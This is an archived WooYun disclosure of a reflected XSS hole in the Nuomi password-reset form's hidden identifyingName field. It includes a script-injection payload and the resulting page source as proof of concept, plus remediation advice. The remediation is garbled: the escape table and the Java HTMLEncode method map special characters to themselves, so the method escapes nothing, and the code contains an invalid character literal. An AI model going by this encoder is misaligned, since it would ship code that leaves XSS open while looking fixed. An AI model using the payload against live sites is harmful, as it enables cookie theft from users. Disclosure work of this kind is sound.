乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2011-04-26: 积极联系厂商并且等待厂商认领中,细节不对外公开 2011-04-27: 厂商已经主动忽略漏洞,细节向公众公开
糯米网存在一个反射式的XSS漏洞,该漏洞是由于没有对表单隐藏字段进行验证导致的。攻击者利用该漏洞,可能盗取用户Cookie。
用户重设密码正常页面:
表单resetForm的隐藏字段identifyingName存在反射式XSS漏洞。
<form id="resetForm" action="/user/passwordRetrieve/getRetrieve" method="post"> <div class="field email"> <label for="email">Email/手机:</label> <div class="input-area"> <p> <input type="text" class="input-txt" id="email" name="emobile" value="" /> </p> <p class="tip">您用来登录的Email地址或手机号码</p> </div> <span class="msg" id="msgEmail"></span> </div> <div class="field icode"> <label for="icode">验证码:</label> <div class="input-area"> <input type="hidden" name="identifyingName" value="vphtg" id="identifyingCodeValue" tabindex="3" /> <p> <input type="text" class="input-txt" id="icode" name="code" /> <img src="/identifyingCode/vphtg" id="identifyingCodeImg" onclick="var rdm = ('' + Math.random()).replace('\.',''); $('#identifyingCodeImg').attr('src','http://www.nuomi.com/identifyingCode/' + rdm);$('#identifyingCodeValue').val(rdm);" /> <a href="javascript:;" onclick="var rdm = ('' + Math.random()).replace('\.',''); $('#identifyingCodeImg').attr('src','http://www.nuomi.com/identifyingCode/' + rdm);$('#identifyingCodeValue').val(rdm);">看不清楚?换一张</a> </p> </div> <span class="msg" id="msgICode"></span> </div> <div class="reset-btn"> <input type="submit" class="input-btn big-blue" value="重设密码" /> </div> </form>
给identifyingName附加
"'/><script>alert('XSS')</script>
后提交的页面:
页面源代码:
<form id="resetForm" action="/user/passwordRetrieve/getRetrieve" method="post"><div class="field email"><label for="email">Email/手机:</label><div class="input-area"><p><input type="text" class="input-txt" id="email" name="emobile" value="" /></p><p class="tip">您用来登录的Email地址或手机号码</p></div><span class="msg" id="msgEmail"><em class="error">请填写Email或手机号</em></span></div><div class="field icode"><label for="icode">验证码:</label><div class="input-area"><input type="hidden" name="identifyingName" value=""'/><script>alert('XSS')</script>" id="identifyingCodeValue" tabindex="3" /><p><input type="text" class="input-txt" id="icode" name="code" /><img src="/identifyingCode/"'/><script>alert('XSS')</script>" id="identifyingCodeImg" onclick="var rdm = ('' + Math.random()).replace('\.',''); $('#identifyingCodeImg').attr('src','http://www.nuomi.com/identifyingCode/' + rdm);$('#identifyingCodeValue').val(rdm);" /> <a href="javascript:;" onclick="var rdm = ('' + Math.random()).replace('\.',''); $('#identifyingCodeImg').attr('src','http://www.nuomi.com/identifyingCode/' + rdm);$('#identifyingCodeValue').val(rdm);">看不清楚?换一张</a></p></div><span class="msg" id="msgICode"></span></div><div class="reset-btn"><input type="submit" class="input-btn big-blue" value="重设密码" /></div></form>
对输入进行过滤或转义,尤其是
' " < > % ( ) # &
等符号及其变形。比如:
<、>
可以转义为
<、>
;
(、)
(、)
#、&
#、&
在ASP/ASP.net中,可以使用:
Server.HTMLEncode(strHTML String)
在Java中,可以使用:
public static String HTMLEncode(String aTagFragment){ final StringBuffer result = new StringBuffer(); final StringCharacterIterator iterator = new StringCharacterIterator(aTagFragment); char character = iterator.current(); while (character != StringCharacterIterator.DONE ){ if (character == '<') { result.append("<"); } else if (character == '>') { result.append(">"); } else if (character == '\"') { result.append("""); } else if (character == '\") { result.append("'"); } else if (character == '\\') { result.append("\"); } else if (character == '&') { result.append("&"); } else { // 如果字符不是特殊字符,则直接添加到结果中 result.append(character); } character = iterator.next(); } return result.toString(); }
未能联系到厂商或者厂商积极拒绝
漏洞Rank:3 (WooYun评价)